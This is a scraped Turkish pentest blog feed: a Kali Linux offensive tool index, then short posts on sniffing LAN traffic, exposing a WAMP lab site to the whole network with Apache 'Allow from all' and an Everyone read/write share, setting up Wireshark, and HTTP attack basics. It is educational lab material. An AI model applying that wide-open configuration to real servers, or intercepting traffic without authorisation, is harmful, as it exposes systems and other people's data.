<li><a href="http://tools.kali.org/stress-testing/thc-ssl-dos" title="THC-SSL-DOS">THC-SSL-DOS</a> </li>
</ul>
</div>
<div class="one_fourth">
<h5>
Sniffing & Spoofing</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/web-applications/burpsuite" title="Burp Suite">Burp Suite</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/dnschef" title="DNSChef">DNSChef</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/fiked" title="fiked">fiked</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/hamster-sidejack" title="hamster-sidejack">hamster-sidejack</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/hexinject" title="HexInject">HexInject</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/iaxflood" title="iaxflood">iaxflood</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/inviteflood" title="inviteflood">inviteflood</a> </li>
<li><a href="http://tools.kali.org/information-gathering/ismtp" title="iSMTP">iSMTP</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/isr-evilgrade" title="isr-evilgrade">isr-evilgrade</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/mitmproxy" title="mitmproxy">mitmproxy</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/ohrwurm" title="ohrwurm">ohrwurm</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/protos-sip" title="protos-sip">protos-sip</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/rebind" title="rebind">rebind</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/responder" title="responder">responder</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/rtpbreak" title="rtpbreak">rtpbreak</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/rtpinsertsound" title="rtpinsertsound">rtpinsertsound</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/rtpmixsound" title="rtpmixsound">rtpmixsound</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/sctpscan" title="sctpscan">sctpscan</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/siparmyknife" title="SIPArmyKnife">SIPArmyKnife</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/sipp" title="SIPp">SIPp</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/sipvicious" title="SIPVicious">SIPVicious</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/sniffjoke" title="SniffJoke">SniffJoke</a> </li>
<li><a href="http://tools.kali.org/information-gathering/sslsplit" title="SSLsplit">SSLsplit</a> </li>
<li><a href="http://tools.kali.org/information-gathering/sslstrip" title="sslstrip">sslstrip</a> </li>
<li><a href="http://tools.kali.org/information-gathering/thc-ipv6" title="THC-IPV6">THC-IPV6</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/voiphopper" title="VoIPHopper">VoIPHopper</a> </li>
<li><a href="http://tools.kali.org/web-applications/webscarab" title="WebScarab">WebScarab</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/wifi-honey" title="Wifi Honey">Wifi Honey</a> </li>
<li><a href="http://tools.kali.org/information-gathering/wireshark" title="Wireshark">Wireshark</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/xspy" title="xspy">xspy</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/yersinia" title="Yersinia">Yersinia</a> </li>
<li><a href="http://tools.kali.org/web-applications/zaproxy" title="zaproxy">zaproxy</a> </li>
</ul>
</div>
<div class="one_fourth">
<h5>
Password Attacks</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/information-gathering/acccheck" title="acccheck">acccheck</a> </li>
<li><a href="http://tools.kali.org/web-applications/burpsuite" title="Burp Suite">Burp Suite</a> </li>
<li><a href="http://tools.kali.org/password-attacks/cewl" title="CeWL">CeWL</a> </li>
<li><a href="http://tools.kali.org/password-attacks/chntpw" title="chntpw">chntpw</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/cisco-auditing-tool" title="cisco-auditing-tool">cisco-auditing-tool</a> </li>
<li><a href="http://tools.kali.org/password-attacks/cmospwd" title="CmosPwd">CmosPwd</a> </li>
<li><a href="http://tools.kali.org/password-attacks/creddump" title="creddump">creddump</a> </li>
<li><a href="http://tools.kali.org/password-attacks/crunch" title="crunch">crunch</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/dbpwaudit" title="DBPwAudit">DBPwAudit</a> </li>
<li><a href="http://tools.kali.org/password-attacks/findmyhash" title="findmyhash">findmyhash</a> </li>
<li><a href="http://tools.kali.org/password-attacks/gpp-decrypt" title="gpp-decrypt">gpp-decrypt</a> </li>
<li><a href="http://tools.kali.org/password-attacks/hash-identifier" title="hash-identifier">hash-identifier</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/hexorbase" title="HexorBase">HexorBase</a> </li>
<li><a href="http://tools.kali.org/password-attacks/hydra" title="THC-Hydra">THC-Hydra</a> </li>
<li><a href="http://tools.kali.org/password-attacks/john" title="John the Ripper">John the Ripper</a> </li>
<li><a href="http://tools.kali.org/password-attacks/johnny" title="Johnny">Johnny</a> </li>
<li><a href="http://tools.kali.org/password-attacks/keimpx" title="keimpx">keimpx</a> </li>
<li><a href="http://tools.kali.org/information-gathering/maltego-teeth" title="Maltego Teeth">Maltego Teeth</a> </li>
<li><a href="http://tools.kali.org/password-attacks/maskprocessor" title="Maskprocessor">Maskprocessor</a> </li>
<li><a href="http://tools.kali.org/password-attacks/multiforcer" title="multiforcer">multiforcer</a> </li>
<li><a href="http://tools.kali.org/password-attacks/ncrack" title="Ncrack">Ncrack</a> </li>
<li><a href="http://tools.kali.org/password-attacks/oclgausscrack" title="oclgausscrack">oclgausscrack</a> </li>
<li><a href="http://tools.kali.org/password-attacks/pack" title="PACK">PACK</a> </li>
<li><a href="http://tools.kali.org/password-attacks/patator" title="patator">patator</a> </li>
<li><a href="http://tools.kali.org/password-attacks/phrasendrescher" title="phrasendrescher">phrasendrescher</a> </li>
<li><a href="http://tools.kali.org/password-attacks/polenum" title="polenum">polenum</a> </li>
<li><a href="http://tools.kali.org/password-attacks/rainbowcrack" title="RainbowCrack">RainbowCrack</a> </li>
<li><a href="http://tools.kali.org/password-attacks/rcracki-mt" title="rcracki-mt">rcracki-mt</a> </li>
<li><a href="http://tools.kali.org/password-attacks/rsmangler" title="RSMangler">RSMangler</a> </li>
<li><a href="http://tools.kali.org/password-attacks/sqldict" title="SQLdict">SQLdict</a> </li>
<li><a href="http://tools.kali.org/password-attacks/statsprocessor" title="Statsprocessor">Statsprocessor</a> </li>
<li><a href="http://tools.kali.org/password-attacks/thc-pptp-bruter" title="THC-pptp-bruter">THC-pptp-bruter</a> </li>
<li><a href="http://tools.kali.org/password-attacks/truecrack" title="TrueCrack">TrueCrack</a> </li>
<li><a href="http://tools.kali.org/web-applications/webscarab" title="WebScarab">WebScarab</a> </li>
<li><a href="http://tools.kali.org/password-attacks/wordlists" title="wordlists">wordlists</a> </li>
<li><a href="http://tools.kali.org/web-applications/zaproxy" title="zaproxy">zaproxy</a> </li>
</ul>
</div>
<div class="one_fourth">
<h5>
Maintaining Access</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/maintaining-access/cryptcat" title="CryptCat">CryptCat</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/cymothoa" title="Cymothoa">Cymothoa</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/dbd" title="dbd">dbd</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/dns2tcp" title="dns2tcp">dns2tcp</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/http-tunnel" title="http-tunnel">http-tunnel</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/httptunnel" title="HTTPTunnel">HTTPTunnel</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/intersect" title="Intersect">Intersect</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/nishang" title="Nishang">Nishang</a> </li>
<li><a href="http://tools.kali.org/password-attacks/polenum" title="polenum">polenum</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/powersploit" title="PowerSploit">PowerSploit</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/pwnat" title="pwnat">pwnat</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/ridenum" title="RidEnum">RidEnum</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/sbd" title="sbd">sbd</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/u3-pwn" title="U3-Pwn">U3-Pwn</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/webshells" title="Webshells">Webshells</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/weevely" title="Weevely">Weevely</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/winexe" title="Winexe">Winexe</a> </li>
</ul>
<h5>
Hardware Hacking</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/hardware-hacking/android-sdk" title="android-sdk">android-sdk</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/apktool" title="apktool">apktool</a> </li>
<li><a href="http://tools.kali.org/hardware-hacking/arduino" title="Arduino">Arduino</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/dex2jar" title="dex2jar">dex2jar</a> </li>
<li><a href="http://tools.kali.org/hardware-hacking/sakis3g" title="Sakis3G">Sakis3G</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/smali" title="smali">smali</a> </li>
</ul>
</div>
<div class="one_fourth last">
<h5>
Reverse Engineering</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/reverse-engineering/apktool" title="apktool">apktool</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/dex2jar" title="dex2jar">dex2jar</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/distorm3" title="diStorm3">diStorm3</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/edb-debugger" title="edb-debugger">edb-debugger</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/jad" title="jad">jad</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/javasnoop" title="javasnoop">javasnoop</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/jd-gui" title="JD-GUI">JD-GUI</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/ollydbg" title="OllyDbg">OllyDbg</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/smali" title="smali">smali</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/valgrind" title="Valgrind">Valgrind</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/yara" title="YARA">YARA</a> </li>
</ul>
<h5>
Reporting Tools</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/information-gathering/casefile" title="CaseFile">CaseFile</a> </li>
<li><a href="http://tools.kali.org/web-applications/cutycapt" title="CutyCapt">CutyCapt</a> </li>
<li><a href="http://tools.kali.org/reporting-tools/dos2unix" title="dos2unix">dos2unix</a> </li>
<li><a href="http://tools.kali.org/reporting-tools/dradis" title="Dradis">Dradis</a> </li>
<li><a href="http://tools.kali.org/reporting-tools/keepnote" title="KeepNote">KeepNote</a> </li>
<li><a href="http://tools.kali.org/reporting-tools/magictree" title="MagicTree">MagicTree</a> </li>
<li><a href="http://tools.kali.org/information-gathering/metagoofil" title="Metagoofil">Metagoofil</a> </li>
<li><a href="http://tools.kali.org/reporting-tools/nipper-ng" title="Nipper-ng">Nipper-ng</a> </li>
<li><a href="http://tools.kali.org/reporting-tools/pipal" title="pipal">pipal</a> </li>
</ul>
</div>
</div>
</div>
<div id="footer">
<div class="multibg">
</div>
</div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-69472330509229796372015-04-10T18:34:00.001+03:002015-04-10T18:34:39.885+03:00Yerel Ağdaki Bilgisayarların Network Trafiğini DinlemeBacktrack gibi linux versiyon işletim sistemlerinde network kartınızı promiscuous moda çekerek yerel ağınızdaki tüm trafiği görebilirsiniz.Bu gerçekleştirmek için aşağıdaki komutu yazın.Wireshark ile de tüm trafiği dinleyebilirsiniz.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg25beTPOd4bV2aAJjVRKPHeAAA71HfoqanAvSnc5b5z_TltRXUbe4CEVG3fNGRJ_UTVc4Sz6tXE0fia20byJGa3bVoh6XZvtjTtNcPY7B3Iao3ylpJpCr5WGbJwrS_QWIzebv_BxitdlY/s1600/promisc.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg25beTPOd4bV2aAJjVRKPHeAAA71HfoqanAvSnc5b5z_TltRXUbe4CEVG3fNGRJ_UTVc4Sz6tXE0fia20byJGa3bVoh6XZvtjTtNcPY7B3Iao3ylpJpCr5WGbJwrS_QWIzebv_BxitdlY/s1600/promisc.PNG" height="302" width="640" /></a></div>
<br />Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-23697825495605879922015-04-10T11:48:00.000+03:002015-04-10T11:48:38.147+03:00Wamp Server ile Yerel Ağınızda Site YayınlamaPentest işlemlerinde test ortamının elinizin altında olması anlık müdahale durumunun bulunması,etki tepkiyi hızlı ölçebilme,yapılan pentest işlemlerinde gerek savunma gerek saldırı vektörlerinin herhangi bir risk taşımadan gerçekleştirebilmesi adına Wamp server vb. araçlarla kendi yerel ağınızda hem sizin hem de yereldeki diğer kullanıcıların kullanacağı site veya siteleri oluşturabilirsiniz.<br />
<br />
Bunun için wamp server indirin ve kurun. Kurduktan sonra Windows ortamı için <b>C:\\wamp\www</b> dizi oluşacaktır. Test etmek veya kullanmak istediğiniz site dosyalarını buraya atın.<br />
<br />
Daha sonra wamp server ın kurulu olduğu bilgisayarda wamp server da apache içinde httpd.conf dosyasında aşağıdaki alanı bulun;<br />
<br />
# Require all granted<br />
# onlineoffline tag - don't remove<br />
Order Deny,Allow<br />
Deny from all<br />
Allow from 127.0.0.1<br />
Allow from ::1<br />
Allow from localhost<br />
</Directory><br />
<br />
Aşağıdaki şekle getirin.<br />
<br />
# Require all granted<br />
# onlineoffline tag - don't remove<br />
Order Deny,Allow<br />
Allow from all<br />
</Directory><br />
<br />
Daha sonra bu bilgisayarda;<br />
<br />
<b>C:\\wamp</b> dizinindeki <b>www </b>klasörüne sağ tıklayın <b>Shared</b>(paylaşım)bölümüne gelin.Aşağıdaki şekilde <b>Everyone </b>grubunu ekleyin ve <b>Read/Write(Okuma/Yazma)</b> özelliğini aktif edin.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggG4-hyUnnHSb8nAfnmg1yZPaWA3JYpuIknkaSDAlUUyAVfXt83bvRbnMH8TSHHKu2fkVPQshsCoWSEmucvHXjWoxyCQJW7vhFu07l8cvhkP3-bnr3yGX2nGMYwtmdYbJ7wHhGTS9d9Kk/s1600/www-kals%C3%B6r%C3%BC-payla%C5%9F%C4%B1m.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggG4-hyUnnHSb8nAfnmg1yZPaWA3JYpuIknkaSDAlUUyAVfXt83bvRbnMH8TSHHKu2fkVPQshsCoWSEmucvHXjWoxyCQJW7vhFu07l8cvhkP3-bnr3yGX2nGMYwtmdYbJ7wHhGTS9d9Kk/s1600/www-kals%C3%B6r%C3%BC-payla%C5%9F%C4%B1m.PNG" height="243" width="400" /></a></div>
<br />
En son olarak bu siteye kim ulaşacaksa eğer makinası windows ise;<br />
<b>C:\Windows\System32\drivers\etc</b> dizininde <b>hosts </b>dosyasına<br />
<br />
<b>192.168.0.30 test.dvwa.com</b> şeklinde yazabilirsiniz<br />
<br />
Buradaki 192.168.0.30 wamp server ın kurulu olduğu bilgisayar <b>IP</b> adresi, <b>test.dvwa.com</b> ise tarayıcıda bu <b>url </b>değerini yazarsanız direkt olarak sizi wamp server da kurulu siteye götürecektir.<br />
<br />
Eğer linux makinanızdan ulaşmak istiyorsanız bu seferde <b>/etc</b> klasöründeki <b>hosts </b>dosyasına;<br />
<br />
<b>192.168.0.30 test.dvwa.com</b> değerini ekleyin ve kaydedip çıkın.<br />
<br />
<br />
<br />
<br />Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com2tag:blogger.com,1999:blog-9189801013696365858.post-45793709174959134782015-03-12T17:29:00.000+02:002015-03-18T17:31:48.015+02:00Sanal makina-Ubuntu da Wireshark Programına Ağ Sürücünü Tanıtma<span style="background-color: #eeeeee;">Sanal makina olarak kurulu olan Ubuntu'da wireshark programına ağ sürücüsünü(network driver) tanıtma işlemine dair yapılması gerekenler aşağıdaki şekilde gösterilmektedir.</span><br />
<span style="background-color: #eeeeee;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdRPxbYfzpWewIJ87_OLkmLGA6AFN5n3xzCrb1rtZ8NTd2kmFBjk3hF6iS_3jLzj4D51BSxjfjMfjdzTEpd8hXSyx8tB1R4M33JAMyxo0b4PldoyiwzaP6FV0Mhvw5UL5dOR7TFhX-Iaw/s1600/W1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdRPxbYfzpWewIJ87_OLkmLGA6AFN5n3xzCrb1rtZ8NTd2kmFBjk3hF6iS_3jLzj4D51BSxjfjMfjdzTEpd8hXSyx8tB1R4M33JAMyxo0b4PldoyiwzaP6FV0Mhvw5UL5dOR7TFhX-Iaw/s1600/W1.PNG" height="301" width="400" /></a></div>
<span style="background-color: #eeeeee;"><br /></span>
<br />
<div>
<span style="background-color: #eeeeee;"></span><br />
<a name='more'></a><span style="background-color: #eeeeee;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<span style="background-color: #eeeeee;">Ancak aşağıdaki komutları yazarak network driver ını wireshark a gösterebiliriz.</span></div>
<div>
<span style="background-color: #eeeeee;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJYPOfjxMagocF9Hh0as4TbQZrv-fmaq_4l0WTYTzGPND3WGv35_lF2ec0-Xgzvyi7gqf6X86TnmOzbHsxKPUL02bCXIJroSIXNFTxwwBHMOfCr1TjHtus9kXV_iKUqA1W5SqtyUoX4lk/s1600/W2.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJYPOfjxMagocF9Hh0as4TbQZrv-fmaq_4l0WTYTzGPND3WGv35_lF2ec0-Xgzvyi7gqf6X86TnmOzbHsxKPUL02bCXIJroSIXNFTxwwBHMOfCr1TjHtus9kXV_iKUqA1W5SqtyUoX4lk/s1600/W2.PNG" height="256" width="400" /></a></div>
<div>
<span style="background-color: #eeeeee;"><br /></span></div>
<div>
<span style="background-color: #eeeeee;">Komutlar yazıldıktan sonra wireshark aşağıdaki şekilde görülmektedir.</span></div>
<div>
<span style="background-color: #eeeeee;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsCKgbjcsqXpSQaEG5vR4gDHz2SzsWTmnRn6z4el0_Ib41coCW52q35x8rV67yODCHfSucWnnEELqYDmZlX2UlpcRjMOdVSNBmO0AjSdleQGwmUJjdF9k6343KGOxYDxVz-1dNVU9HecE/s1600/W3.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsCKgbjcsqXpSQaEG5vR4gDHz2SzsWTmnRn6z4el0_Ib41coCW52q35x8rV67yODCHfSucWnnEELqYDmZlX2UlpcRjMOdVSNBmO0AjSdleQGwmUJjdF9k6343KGOxYDxVz-1dNVU9HecE/s1600/W3.PNG" height="303" width="400" /></a></div>
<div>
<span style="background-color: #eeeeee;"><br /></span></div>
<div>
<br /></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-70782900221598865142015-03-11T09:43:00.000+02:002015-03-18T17:32:01.786+02:00HTTP Protokolüne Dair Önemli Bilgiler<h3 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 24px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">
En çok Görülen Saldırı Yöntemleri</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Broken authentication:</strong> Giriş-login alanlarının yanlış yapılandırılması sonucu giriş alanlarının atlatılması ya da zayıf password yapısından yararlanarak kaba-kuvvet(brute-force) saldırıları ile izinsiz-yetkisiz giriş yapılama durumudur.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Broken access controls: </strong>Sunucu üzerinde eksiz veya yanlış yapılandırılma sonucu yetkisi dahilinde olmayan kullanıcıların bilgilerine ulaşmayı sağlayan açıklıklardır.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Sql Injection: </strong>Uygulama ile veritabanı arasındaki etkileşim açıklıklarını kullanarak izinsiz-yetkisi dahilinde olmayan bilgileri alma,veritabanı sunucusunu istediği gibi yönetme olaylarını sağlayan açıktır.</span><br />
<a name='more'></a></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Cross-site scripting: </strong>Javscript kodları kulalnıcalara dair bilgilerin çalındığı saldırılardır.(XSS saldırıları)</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Cross-site request forgery: </strong>Javascript kodları kullanılır ancak bu saldırlarda etkileşimi sağlayan kurbanlardır. Normal görünen zararlı linkler,resimler vb. nesnelerle etkileşim sonucu zafiyetin oluşması durumudur.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Information leakage: </strong>Uygulama hatalarının tahlil edilmesi sonucu uygulamaya dair hassas bilgilerin elde edilerek saldırının gerçkeleşmesi durumudur.</span></div>
<h3 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 24px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: #eeeeee; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">HTTP Metotları</strong></h3>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">GET</strong>: İsteğin ve parametrelerin URL içinde gitmesi durumunda kullanılır.Giden her istek loglanacağı için hassas parametrelerde şifre kullanıcı adı bilgileri loglanır.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">POST</strong>: Parametrelerin URL alanında değilde body alanında gitmesi durumunda kullanılır.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">HEAD</strong>: İstekde sadece URL bilgi vardır. Bu sunucunun varlığını ya da isteğin sunucuda bulunması durumunu kontrol etmede kullanılır.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">TRACE</strong>: Bu method ile istek-request değerinin değiştirilip değiştirilmediği kontrol edilir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">OPTIONS</strong>: Sunucu da kullanılabilecek http metotların listesi istenir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">PUT</strong>: Sunucuya veri eklemek için kulalnılan bir yöntemdir. Kontrolü iyi yapılandırılmadır. Yoksa zararlı veri enjekte edilebilinir.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">DELETE</strong>: Sunucuya veri silmek için kulalnılan bir yöntemdir. Kontrolü iyi yapılandırılmadır.</span></div>
<h3 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 24px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: #eeeeee; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">HTTP Request Değerlerinin Anlamı</strong></h3>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">GET </strong>/auth/488/YourDetails.ashx?uid=129 HTTP/1.1</span><br />
<span style="background-color: #eeeeee;">Accept: application/x-ms-application, image/jpeg, application/xaml+xml,</span><br />
<span style="background-color: #eeeeee;">image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwaveflash,</span><br />
<span style="background-color: #eeeeee;">*/*</span><br />
<span style="background-color: #eeeeee;">Referer: https://mdsec.net/auth/488/Home.ashx</span><br />
<span style="background-color: #eeeeee;">Accept-Language: en-GB</span><br />
<span style="background-color: #eeeeee;">User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64;</span><br />
<span style="background-color: #eeeeee;">Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR</span><br />
<span style="background-color: #eeeeee;">3.0.30729; .NET4.0C; InfoPath.3; .NET4.0E; FDM; .NET CLR 1.1.4322)</span><br />
<span style="background-color: #eeeeee;">Accept-Encoding: gzip, deflate</span><br />
<span style="background-color: #eeeeee;">Host: mdsec.net</span><br />
